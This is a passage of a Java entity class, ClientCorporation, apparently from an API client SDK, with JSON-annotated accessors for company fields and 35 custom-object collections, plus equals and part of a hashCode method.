private OneToMany<ClientCorporationCustomObjectInstance10> customObject10s;
private OneToMany<ClientCorporationCustomObjectInstance11> customObject11s;
private OneToMany<ClientCorporationCustomObjectInstance12> customObject12s;
private OneToMany<ClientCorporationCustomObjectInstance13> customObject13s;
private OneToMany<ClientCorporationCustomObjectInstance14> customObject14s;
private OneToMany<ClientCorporationCustomObjectInstance15> customObject15s;
private OneToMany<ClientCorporationCustomObjectInstance16> customObject16s;
private OneToMany<ClientCorporationCustomObjectInstance17> customObject17s;
private OneToMany<ClientCorporationCustomObjectInstance18> customObject18s;
private OneToMany<ClientCorporationCustomObjectInstance19> customObject19s;
private OneToMany<ClientCorporationCustomObjectInstance20> customObject20s;
private OneToMany<ClientCorporationCustomObjectInstance21> customObject21s;
private OneToMany<ClientCorporationCustomObjectInstance22> customObject22s;
private OneToMany<ClientCorporationCustomObjectInstance23> customObject23s;
private OneToMany<ClientCorporationCustomObjectInstance24> customObject24s;
private OneToMany<ClientCorporationCustomObjectInstance25> customObject25s;
private OneToMany<ClientCorporationCustomObjectInstance26> customObject26s;
private OneToMany<ClientCorporationCustomObjectInstance27> customObject27s;
private OneToMany<ClientCorporationCustomObjectInstance28> customObject28s;
private OneToMany<ClientCorporationCustomObjectInstance29> customObject29s;
private OneToMany<ClientCorporationCustomObjectInstance30> customObject30s;
private OneToMany<ClientCorporationCustomObjectInstance31> customObject31s;
private OneToMany<ClientCorporationCustomObjectInstance32> customObject32s;
private OneToMany<ClientCorporationCustomObjectInstance33> customObject33s;
private OneToMany<ClientCorporationCustomObjectInstance34> customObject34s;
private OneToMany<ClientCorporationCustomObjectInstance35> customObject35s;
public ClientCorporation() {
super();
}
public ClientCorporation(Integer id) {
super();
this.id = id;
}
@JsonProperty("id")
public Integer getId() {
return id;
}
@ReadOnly
@JsonProperty("id")
public void setId(Integer id) {
this.id = id;
}
@JsonProperty("address")
public Address getAddress() {
return address;
}
@JsonProperty("address")
public void setAddress(Address address) {
this.address = address;
}
@JsonProperty("annualRevenue")
public BigDecimal getAnnualRevenue() {
return annualRevenue;
}
@JsonProperty("annualRevenue")
public void setAnnualRevenue(BigDecimal annualRevenue) {
this.annualRevenue = annualRevenue;
}
@JsonProperty("billingAddress")
public Address getBillingAddress() {
return billingAddress;
}
@JsonProperty("billingAddress")
public void setBillingAddress(Address billingAddress) {
this.billingAddress = billingAddress;
}
@JsonProperty("billingContact")
public String getBillingContact() {
return billingContact;
}
@JsonIgnore
public void setBillingContact(String billingContact) {
this.billingContact = billingContact;
}
@JsonProperty("billingFrequency")
public String getBillingFrequency() {
return billingFrequency;
}
@JsonIgnore
public void setBillingFrequency(String billingFrequency) {
this.billingFrequency = billingFrequency;
}
@JsonProperty("billingPhone")
public String getBillingPhone() {
return billingPhone;
}
@JsonIgnore
public void setBillingPhone(String billingPhone) {
this.billingPhone = billingPhone;
}
@JsonProperty("branch")
public Branch getBranch() {
return branch;
}
@JsonProperty("branch")
public void setBranch(Branch branch) {
this.branch = branch;
}
@JsonProperty("businessSectorList")
public String getBusinessSectorList() {
return businessSectorList;
}
@JsonIgnore
public void setBusinessSectorList(String businessSectorList) {
this.businessSectorList = businessSectorList;
}
@JsonProperty("childClientCorporations")
public OneToMany<ClientCorporation> getChildClientCorporations() {
return childClientCorporations;
}
@ReadOnly
@JsonProperty("childClientCorporations")
public void setChildClientCorporations(OneToMany<ClientCorporation> childClientCorporations) {
this.childClientCorporations = childClientCorporations;
}
@JsonProperty("clientContacts")
public OneToMany<ClientContact> getClientContacts() {
return clientContacts;
}
@ReadOnly
@JsonProperty("clientContacts")
public void setClientContacts(OneToMany<ClientContact> clientContacts) {
this.clientContacts = clientContacts;
}
@JsonProperty("companyDescription")
public String getCompanyDescription() {
return companyDescription;
}
@JsonIgnore
public void setCompanyDescription(String companyDescription) {
this.companyDescription = companyDescription;
}
@JsonProperty("companyURL")
public String getCompanyURL() {
return companyURL;
}
@JsonIgnore
public void setCompanyURL(String companyURL) {
this.companyURL = companyURL;
}
@JsonProperty("competitors")
public String getCompetitors() {
return competitors;
}
@JsonIgnore
public void setCompetitors(String competitors) {
this.competitors = competitors;
}
@JsonProperty("culture")
public String getCulture() {
return culture;
}
@JsonIgnore
public void setCulture(String culture) {
this.culture = culture;
}
@JsonProperty("dateAdded")
public DateTime getDateAdded() {
return dateAdded;
}
@ReadOnly
@JsonProperty("dateAdded")
public void setDateAdded(DateTime dateAdded) {
this.dateAdded = dateAdded;
}
@JsonProperty("dateFounded")
public DateTime getDateFounded() {
return dateFounded;
}
@JsonProperty("dateFounded")
public void setDateFounded(DateTime dateFounded) {
this.dateFounded = dateFounded;
}
@JsonProperty("dateLastModified")
public DateTime getDateLastModified() {
return dateLastModified;
}
@ReadOnly
@JsonProperty("dateLastModified")
public void setDateLastModified(DateTime dateLastModified) {
this.dateLastModified = dateLastModified;
}
@JsonProperty("department")
public CorporationDepartment getDepartment() {
return department;
}
@JsonProperty("department")
public void setDepartment(CorporationDepartment department) {
this.department = department;
}
@JsonProperty("externalID")
public String getExternalID() {
return externalID;
}
@JsonIgnore
public void setExternalID(String externalID) {
this.externalID = externalID;
}
@JsonProperty("fax")
public String getFax() {
return fax;
}
@JsonProperty("fax")
public void setFax(String fax) {
this.fax = fax;
}
@JsonProperty("feeArrangement")
public BigDecimal getFeeArrangement() {
return feeArrangement;
}
@JsonProperty("feeArrangement")
public void setFeeArrangement(BigDecimal feeArrangement) {
this.feeArrangement = feeArrangement;
}
@JsonProperty("funding")
public String getFunding() {
return funding;
}
@JsonIgnore
public void setFunding(String funding) {
this.funding = funding;
}
@JsonProperty("industryList")
public String getIndustryList() {
return industryList;
}
@JsonIgnore
public void setIndustryList(String industryList) {
this.industryList = industryList;
}
@JsonProperty("invoiceFormat")
public String getInvoiceFormat() {
return invoiceFormat;
}
@JsonProperty("invoiceFormat")
public void setInvoiceFormat(String invoiceFormat) {
this.invoiceFormat = invoiceFormat;
}
@JsonProperty("leads")
public OneToMany<Lead> getLeads() {
return leads;
}
@JsonProperty("leads")
public void setLeads(OneToMany<Lead> leads) {
this.leads = leads;
}
@JsonProperty("linkedinProfileName")
public String getLinkedinProfileName() {
return linkedinProfileName;
}
@JsonIgnore
public void setLinkedinProfileName(String linkedinProfileName) {
this.linkedinProfileName = linkedinProfileName;
}
@JsonProperty("name")
public String getName() {
return name;
}
@JsonIgnore
public void setName(String name) {
this.name = name;
}
@JsonProperty("notes")
public String getNotes() {
return notes;
}
@JsonIgnore
public void setNotes(String notes) {
this.notes = notes;
}
@JsonProperty("numEmployees")
public Integer getNumEmployees() {
return numEmployees;
}
@JsonProperty("numEmployees")
public void setNumEmployees(Integer numEmployees) {
this.numEmployees = numEmployees;
}
@JsonProperty("numOffices")
public Integer getNumOffices() {
return numOffices;
}
@JsonProperty("numOffices")
public void setNumOffices(Integer numOffices) {
this.numOffices = numOffices;
}
@JsonProperty("ownership")
public String getOwnership() {
return ownership;
}
@JsonIgnore
public void setOwnership(String ownership) {
this.ownership = ownership;
}
@JsonIgnore
public OneToManyLinkedId getOwners() {
return owners;
}
@ReadOnly
@JsonProperty("owners")
public void setOwners(OneToManyLinkedId owners) {
this.owners = owners;
}
@JsonProperty("parentClientCorporation")
public ClientCorporation getParentClientCorporation() {
return parentClientCorporation;
}
@JsonProperty("parentClientCorporation")
public void setParentClientCorporation(ClientCorporation parentClientCorporation) {
this.parentClientCorporation = parentClientCorporation;
}
@JsonProperty("phone")
public String getPhone() {
return phone;
}
@JsonIgnore
public void setPhone(String phone) {
this.phone = phone;
}
@JsonProperty("revenue")
public String getRevenue() {
return revenue;
}
@JsonIgnore
public void setRevenue(String revenue) {
this.revenue = revenue;
}
@JsonProperty("status")
public String getStatus() {
return status;
}
@JsonIgnore
public void setStatus(String status) {
this.status = status;
}
@JsonProperty("taxRate")
public BigDecimal getTaxRate() {
return taxRate;
}
@JsonProperty("taxRate")
public void setTaxRate(BigDecimal taxRate) {
this.taxRate = taxRate;
}
@JsonProperty("tickerSymbol")
public String getTickerSymbol() {
return tickerSymbol;
}
@JsonIgnore
public void setTickerSymbol(String tickerSymbol) {
this.tickerSymbol = tickerSymbol;
}
@JsonProperty("trackTitle")
public String getTrackTitle() {
return trackTitle;
}
@JsonIgnore
public void setTrackTitle(String trackTitle) {
this.trackTitle = trackTitle;
}
@JsonProperty("workWeekStart")
public Integer getWorkWeekStart() {
return workWeekStart;
}
@JsonProperty("workWeekStart")
public void setWorkWeekStart(Integer workWeekStart) {
this.workWeekStart = workWeekStart;
}
@JsonProperty("requirements")
public OneToMany<Certification> getRequirements() {
return requirements;
}
@ReadOnly
@JsonProperty("requirements")
public void setRequirements(OneToMany<Certification> requirements) {
this.requirements = requirements;
}
@JsonProperty("certificationGroups")
public OneToMany<CertificationGroup> getCertificationGroups() {
return certificationGroups;
}
@ReadOnly
@JsonProperty("certificationGroups")
public void setCertificationGroups(OneToMany<CertificationGroup> certificationGroups) {
this.certificationGroups = certificationGroups;
}
@JsonProperty("certifications")
public OneToMany<ClientCorporationCertification> getCertifications() {
return certifications;
}
@ReadOnly
@JsonProperty("certifications")
public void setCertifications(OneToMany<ClientCorporationCertification> certifications) {
this.certifications = certifications;
}
@JsonProperty("customObject1s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance1> getCustomObject1s() {
return customObject1s;
}
@JsonProperty("customObject1s")
public void setCustomObject1s(OneToMany<ClientCorporationCustomObjectInstance1> customObject1s) {
this.customObject1s = customObject1s;
}
@JsonProperty("customObject2s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance2> getCustomObject2s() {
return customObject2s;
}
@JsonProperty("customObject2s")
public void setCustomObject2s(OneToMany<ClientCorporationCustomObjectInstance2> customObject2s) {
this.customObject2s = customObject2s;
}
@JsonProperty("customObject3s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance3> getCustomObject3s() {
return customObject3s;
}
@JsonProperty("customObject3s")
public void setCustomObject3s(OneToMany<ClientCorporationCustomObjectInstance3> customObject3s) {
this.customObject3s = customObject3s;
}
@JsonProperty("customObject4s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance4> getCustomObject4s() {
return customObject4s;
}
@JsonProperty("customObject4s")
public void setCustomObject4s(OneToMany<ClientCorporationCustomObjectInstance4> customObject4s) {
this.customObject4s = customObject4s;
}
@JsonProperty("customObject5s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance5> getCustomObject5s() {
return customObject5s;
}
@JsonProperty("customObject5s")
public void setCustomObject5s(OneToMany<ClientCorporationCustomObjectInstance5> customObject5s) {
this.customObject5s = customObject5s;
}
@JsonProperty("customObject6s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance6> getCustomObject6s() {
return customObject6s;
}
@JsonProperty("customObject6s")
public void setCustomObject6s(OneToMany<ClientCorporationCustomObjectInstance6> customObject6s) {
this.customObject6s = customObject6s;
}
@JsonProperty("customObject7s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance7> getCustomObject7s() {
return customObject7s;
}
@JsonProperty("customObject7s")
public void setCustomObject7s(OneToMany<ClientCorporationCustomObjectInstance7> customObject7s) {
this.customObject7s = customObject7s;
}
@JsonProperty("customObject8s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance8> getCustomObject8s() {
return customObject8s;
}
@JsonProperty("customObject8s")
public void setCustomObject8s(OneToMany<ClientCorporationCustomObjectInstance8> customObject8s) {
this.customObject8s = customObject8s;
}
@JsonProperty("customObject9s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance9> getCustomObject9s() {
return customObject9s;
}
@JsonProperty("customObject9s")
public void setCustomObject9s(OneToMany<ClientCorporationCustomObjectInstance9> customObject9s) {
this.customObject9s = customObject9s;
}
@JsonProperty("customObject10s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance10> getCustomObject10s() {
return customObject10s;
}
@JsonProperty("customObject10s")
public void setCustomObject10s(OneToMany<ClientCorporationCustomObjectInstance10> customObject10s) {
this.customObject10s = customObject10s;
}
@JsonProperty("customObject11s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance11> getCustomObject11s() {
return customObject11s;
}
@JsonProperty("customObject11s")
public void setCustomObject11s(OneToMany<ClientCorporationCustomObjectInstance11> customObject11s) {
this.customObject11s = customObject11s;
}
@JsonProperty("customObject12s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance12> getCustomObject12s() {
return customObject12s;
}
@JsonProperty("customObject12s")
public void setCustomObject12s(OneToMany<ClientCorporationCustomObjectInstance12> customObject12s) {
this.customObject12s = customObject12s;
}
@JsonProperty("customObject13s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance13> getCustomObject13s() {
return customObject13s;
}
@JsonProperty("customObject13s")
public void setCustomObject13s(OneToMany<ClientCorporationCustomObjectInstance13> customObject13s) {
this.customObject13s = customObject13s;
}
@JsonProperty("customObject14s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance14> getCustomObject14s() {
return customObject14s;
}
@JsonProperty("customObject14s")
public void setCustomObject14s(OneToMany<ClientCorporationCustomObjectInstance14> customObject14s) {
this.customObject14s = customObject14s;
}
@JsonProperty("customObject15s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance15> getCustomObject15s() {
return customObject15s;
}
@JsonProperty("customObject15s")
public void setCustomObject15s(OneToMany<ClientCorporationCustomObjectInstance15> customObject15s) {
this.customObject15s = customObject15s;
}
@JsonProperty("customObject16s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance16> getCustomObject16s() {
return customObject16s;
}
@JsonProperty("customObject16s")
public void setCustomObject16s(OneToMany<ClientCorporationCustomObjectInstance16> customObject16s) {
this.customObject16s = customObject16s;
}
@JsonProperty("customObject17s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance17> getCustomObject17s() {
return customObject17s;
}
@JsonProperty("customObject17s")
public void setCustomObject17s(OneToMany<ClientCorporationCustomObjectInstance17> customObject17s) {
this.customObject17s = customObject17s;
}
@JsonProperty("customObject18s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance18> getCustomObject18s() {
return customObject18s;
}
@JsonProperty("customObject18s")
public void setCustomObject18s(OneToMany<ClientCorporationCustomObjectInstance18> customObject18s) {
this.customObject18s = customObject18s;
}
@JsonProperty("customObject19s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance19> getCustomObject19s() { return customObject19s; }
@JsonProperty("customObject19s")
public void setCustomObject19s(OneToMany<ClientCorporationCustomObjectInstance19> customObject19s) { this.customObject19s = customObject19s; }
@JsonProperty("customObject20s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance20> getCustomObject20s() {
return customObject20s;
}
@JsonProperty("customObject20s")
public void setCustomObject20s(OneToMany<ClientCorporationCustomObjectInstance20> customObject20s) {
this.customObject20s = customObject20s;
}
@JsonProperty("customObject21s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance21> getCustomObject21s() {
return customObject21s;
}
@JsonProperty("customObject21s")
public void setCustomObject21s(OneToMany<ClientCorporationCustomObjectInstance21> customObject21s) {
this.customObject21s = customObject21s;
}
@JsonProperty("customObject22s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance22> getCustomObject22s() {
return customObject22s;
}
@JsonProperty("customObject22s")
public void setCustomObject22s(OneToMany<ClientCorporationCustomObjectInstance22> customObject22s) {
this.customObject22s = customObject22s;
}
@JsonProperty("customObject23s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance23> getCustomObject23s() {
return customObject23s;
}
@JsonProperty("customObject23s")
public void setCustomObject23s(OneToMany<ClientCorporationCustomObjectInstance23> customObject23s) {
this.customObject23s = customObject23s;
}
@JsonProperty("customObject24s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance24> getCustomObject24s() {
return customObject24s;
}
@JsonProperty("customObject24s")
public void setCustomObject24s(OneToMany<ClientCorporationCustomObjectInstance24> customObject24s) {
this.customObject24s = customObject24s;
}
@JsonProperty("customObject25s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance25> getCustomObject25s() {
return customObject25s;
}
@JsonProperty("customObject25s")
public void setCustomObject25s(OneToMany<ClientCorporationCustomObjectInstance25> customObject25s) {
this.customObject25s = customObject25s;
}
@JsonProperty("customObject26s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance26> getCustomObject26s() {
return customObject26s;
}
@JsonProperty("customObject26s")
public void setCustomObject26s(OneToMany<ClientCorporationCustomObjectInstance26> customObject26s) {
this.customObject26s = customObject26s;
}
@JsonProperty("customObject27s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance27> getCustomObject27s() {
return customObject27s;
}
@JsonProperty("customObject27s")
public void setCustomObject27s(OneToMany<ClientCorporationCustomObjectInstance27> customObject27s) {
this.customObject27s = customObject27s;
}
@JsonProperty("customObject28s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance28> getCustomObject28s() {
return customObject28s;
}
@JsonProperty("customObject28s")
public void setCustomObject28s(OneToMany<ClientCorporationCustomObjectInstance28> customObject28s) {
this.customObject28s = customObject28s;
}
@JsonProperty("customObject29s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance29> getCustomObject29s() {
return customObject29s;
}
@JsonProperty("customObject29s")
public void setCustomObject29s(OneToMany<ClientCorporationCustomObjectInstance29> customObject29s) {
this.customObject29s = customObject29s;
}
@JsonProperty("customObject230s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance30> getCustomObject30s() {
return customObject30s;
}
@JsonProperty("customObject30s")
public void setCustomObject30s(OneToMany<ClientCorporationCustomObjectInstance30> customObject30s) {
this.customObject30s = customObject30s;
}
@JsonProperty("customObject31s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance31> getCustomObject31s() {
return customObject31s;
}
@JsonProperty("customObject31s")
public void setCustomObject31s(OneToMany<ClientCorporationCustomObjectInstance31> customObject31s) {
this.customObject31s = customObject31s;
}
@JsonProperty("customObject32s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance32> getCustomObject32s() {
return customObject32s;
}
@JsonProperty("customObject32s")
public void setCustomObject32s(OneToMany<ClientCorporationCustomObjectInstance32> customObject32s) {
this.customObject32s = customObject32s;
}
@JsonProperty("customObject33s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance33> getCustomObject33s() {
return customObject33s;
}
@JsonProperty("customObject33s")
public void setCustomObject33s(OneToMany<ClientCorporationCustomObjectInstance33> customObject33s) {
this.customObject33s = customObject33s;
}
@JsonProperty("customObject34s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance34> getCustomObject34s() {
return customObject34s;
}
@JsonProperty("customObject34s")
public void setCustomObject34s(OneToMany<ClientCorporationCustomObjectInstance34> customObject34s) {
this.customObject34s = customObject34s;
}
@JsonProperty("customObject35s")
@JsonSerialize(using = RestOneToManySerializer.class)
@JsonInclude(JsonInclude.Include.NON_NULL)
public OneToMany<ClientCorporationCustomObjectInstance35> getCustomObject35s() {
return customObject35s;
}
@JsonProperty("customObject35s")
public void setCustomObject35s(OneToMany<ClientCorporationCustomObjectInstance35> customObject35s) {
this.customObject35s = customObject35s;
}
@Override
public boolean equals(Object o) {
if (this == o) return true;
if (o == null || getClass() != o.getClass()) return false;
if (!super.equals(o)) return false;
ClientCorporation that = (ClientCorporation) o;
if (id != null ? !id.equals(that.id) : that.id != null) return false;
if (address != null ? !address.equals(that.address) : that.address != null) return false;
if (annualRevenue != null ? !annualRevenue.equals(that.annualRevenue) : that.annualRevenue != null)
return false;
if (billingAddress != null ? !billingAddress.equals(that.billingAddress) : that.billingAddress != null)
return false;
if (billingContact != null ? !billingContact.equals(that.billingContact) : that.billingContact != null)
return false;
if (billingFrequency != null ? !billingFrequency.equals(that.billingFrequency) : that.billingFrequency != null)
return false;
if (billingPhone != null ? !billingPhone.equals(that.billingPhone) : that.billingPhone != null) return false;
if (branch != null ? !branch.equals(that.branch) : that.branch != null) return false;
if (businessSectorList != null ? !businessSectorList.equals(that.businessSectorList) : that.businessSectorList != null)
return false;
if (childClientCorporations != null ? !childClientCorporations.equals(that.childClientCorporations) : that.childClientCorporations != null)
return false;
if (clientContacts != null ? !clientContacts.equals(that.clientContacts) : that.clientContacts != null)
return false;
if (companyDescription != null ? !companyDescription.equals(that.companyDescription) : that.companyDescription != null)
return false;
if (companyURL != null ? !companyURL.equals(that.companyURL) : that.companyURL != null) return false;
if (competitors != null ? !competitors.equals(that.competitors) : that.competitors != null) return false;
if (culture != null ? !culture.equals(that.culture) : that.culture != null) return false;
if (dateAdded != null ? !dateAdded.equals(that.dateAdded) : that.dateAdded != null) return false;
if (dateFounded != null ? !dateFounded.equals(that.dateFounded) : that.dateFounded != null) return false;
if (dateLastModified != null ? !dateLastModified.equals(that.dateLastModified) : that.dateLastModified != null)
return false;
if (department != null ? !department.equals(that.department) : that.department != null) return false;
if (externalID != null ? !externalID.equals(that.externalID) : that.externalID != null) return false;
if (fax != null ? !fax.equals(that.fax) : that.fax != null) return false;
if (feeArrangement != null ? !feeArrangement.equals(that.feeArrangement) : that.feeArrangement != null)
return false;
if (funding != null ? !funding.equals(that.funding) : that.funding != null) return false;
if (industryList != null ? !industryList.equals(that.industryList) : that.industryList != null) return false;
if (invoiceFormat != null ? !invoiceFormat.equals(that.invoiceFormat) : that.invoiceFormat != null)
return false;
if (leads != null ? !leads.equals(that.leads) : that.leads != null) return false;
if (linkedinProfileName != null ? !linkedinProfileName.equals(that.linkedinProfileName) : that.linkedinProfileName != null) return false;
if (name != null ? !name.equals(that.name) : that.name != null) return false;
if (notes != null ? !notes.equals(that.notes) : that.notes != null) return false;
if (numEmployees != null ? !numEmployees.equals(that.numEmployees) : that.numEmployees != null) return false;
if (numOffices != null ? !numOffices.equals(that.numOffices) : that.numOffices != null) return false;
if (ownership != null ? !ownership.equals(that.ownership) : that.ownership != null) return false;
if (owners != null ? !owners.equals(that.owners) : that.owners != null) return false;
if (parentClientCorporation != null ? !parentClientCorporation.equals(that.parentClientCorporation) : that.parentClientCorporation != null)
return false;
if (phone != null ? !phone.equals(that.phone) : that.phone != null) return false;
if (revenue != null ? !revenue.equals(that.revenue) : that.revenue != null) return false;
if (status != null ? !status.equals(that.status) : that.status != null) return false;
if (taxRate != null ? !taxRate.equals(that.taxRate) : that.taxRate != null) return false;
if (tickerSymbol != null ? !tickerSymbol.equals(that.tickerSymbol) : that.tickerSymbol != null) return false;
if (trackTitle != null ? !trackTitle.equals(that.trackTitle) : that.trackTitle != null) return false;
if (workWeekStart != null ? !workWeekStart.equals(that.workWeekStart) : that.workWeekStart != null)
return false;
if (requirements != null ? !requirements.equals(that.requirements) : that.requirements != null)
return false;
if (certificationGroups != null ? !certificationGroups.equals(that.certificationGroups) : that.certificationGroups != null)
return false;
if (customObject1s != null ? !customObject1s.equals(that.customObject1s) : that.customObject1s != null)
return false;
if (customObject2s != null ? !customObject2s.equals(that.customObject2s) : that.customObject2s != null)
return false;
if (customObject3s != null ? !customObject3s.equals(that.customObject3s) : that.customObject3s != null)
return false;
if (customObject4s != null ? !customObject4s.equals(that.customObject4s) : that.customObject4s != null)
return false;
if (customObject5s != null ? !customObject5s.equals(that.customObject5s) : that.customObject5s != null)
return false;
if (customObject6s != null ? !customObject6s.equals(that.customObject6s) : that.customObject6s != null)
return false;
if (customObject7s != null ? !customObject7s.equals(that.customObject7s) : that.customObject7s != null)
return false;
if (customObject8s != null ? !customObject8s.equals(that.customObject8s) : that.customObject8s != null)
return false;
if (customObject9s != null ? !customObject9s.equals(that.customObject9s) : that.customObject9s != null)
return false;
if (customObject10s != null ? !customObject10s.equals(that.customObject10s) : that.customObject10s != null)
return false;
if (customObject11s != null ? !customObject11s.equals(that.customObject11s) : that.customObject11s != null)
return false;
if (customObject12s != null ? !customObject12s.equals(that.customObject12s) : that.customObject12s != null)
return false;
if (customObject13s != null ? !customObject13s.equals(that.customObject13s) : that.customObject13s != null)
return false;
if (customObject14s != null ? !customObject14s.equals(that.customObject14s) : that.customObject14s != null)
return false;
if (customObject15s != null ? !customObject15s.equals(that.customObject15s) : that.customObject15s != null)
return false;
if (customObject16s != null ? !customObject16s.equals(that.customObject16s) : that.customObject16s != null)
return false;
if (customObject17s != null ? !customObject17s.equals(that.customObject17s) : that.customObject17s != null)
return false;
if (customObject18s != null ? !customObject18s.equals(that.customObject18s) : that.customObject18s != null)
return false;
if (customObject19s != null ? !customObject19s.equals(that.customObject19s) : that.customObject19s != null)
return false;
return customObject20s != null ? customObject20s.equals(that.customObject20s) : that.customObject20s == null;
}
@Override
public int hashCode() {
int result = super.hashCode();
result = 31 * result + (id != null ? id.hashCode() : 0);
result = 31 * result + (address != null ? address.hashCode() : 0);
result = 31 * result + (annualRevenue != null ? annualRevenue.hashCode() : 0);
result = 31 * result + (billingAddress != null ? billingAddress.hashCode() : 0);
result = 31 * result + (billingContact != null ? billingContact.hashCode() : 0);
result = 31 * result + (billingFrequency != null ? billingFrequency.hashCode() : 0);
result = 31 * result + (billingPhone != null ? billingPhone.hashCode() : 0);
result = 31 * result + (branch != null ? branch.hashCode() : 0);
result = 31 * result + (businessSectorList != null ? businessSectorList.hashCode() : 0);
result = 31 * result + (childClientCorporations != null ? childClientCorporations.hashCode() : 0);
result = 31 * result + (clientContacts != null ? clientContacts.hashCode() : 0);
result = 31 * result + (companyDescription != null ? companyDescription.hashCode() : 0);
result = 31 * result + (companyURL != null ? companyURL.hashCode() : 0);
result = 31 * result + (competitors != null ? competitors.hashCode() : 0);
result = 31 * result + (culture != null ? culture.hashCode() : 0);
result = 31 * result + (dateAdded != null ? dateAdded.hashCode() : 0);
result = 31 * result + (dateFounded != null ? dateFounded.hashCode() : 0);
result = 31 * result + (dateLastModified != null ? dateLastModified.hashCode() : 0);
result = 31 * result + (department != null ? department.hashCode() : 0);
result = 31 * result + (externalID != null ? externalID.hashCode() : 0);
result = 31 * result + (fax != null ? fax.hashCode() : 0);
result = 31 * result + (feeArrangement != null ? feeArrangement.hashCode() : 0);
result = 31 * result + (funding != null ? funding.hashCode() : 0);
result = 31 * result + (industryList != null ? industryList.hashCode() : 0);
result = 31 * result + (invoiceFormat != null ? invoiceFormat.hashCode() : 0);
result = 31 * result + (leads != null ? leads.hashCode() : 0);
result = 31 * result + (linkedinProfileName != null ? linkedinProfileName.hashCode() : 0);
result = 31 * result + (name != null ? name.hashCode() : 0);
result = 31 * result + (notes != null ? notes.hashCode() : 0);
result = 31 * result + (numEmployees != null ? numEmployees.hashCode() : 0);
result = 31 * result + (numOffices != null ? numOffices.hashCode() : 0);
result = 31 * result + (ownership != null ? ownership.hashCode() : 0);
result = 31 * result + (owners != null ? owners.hashCode() : 0);
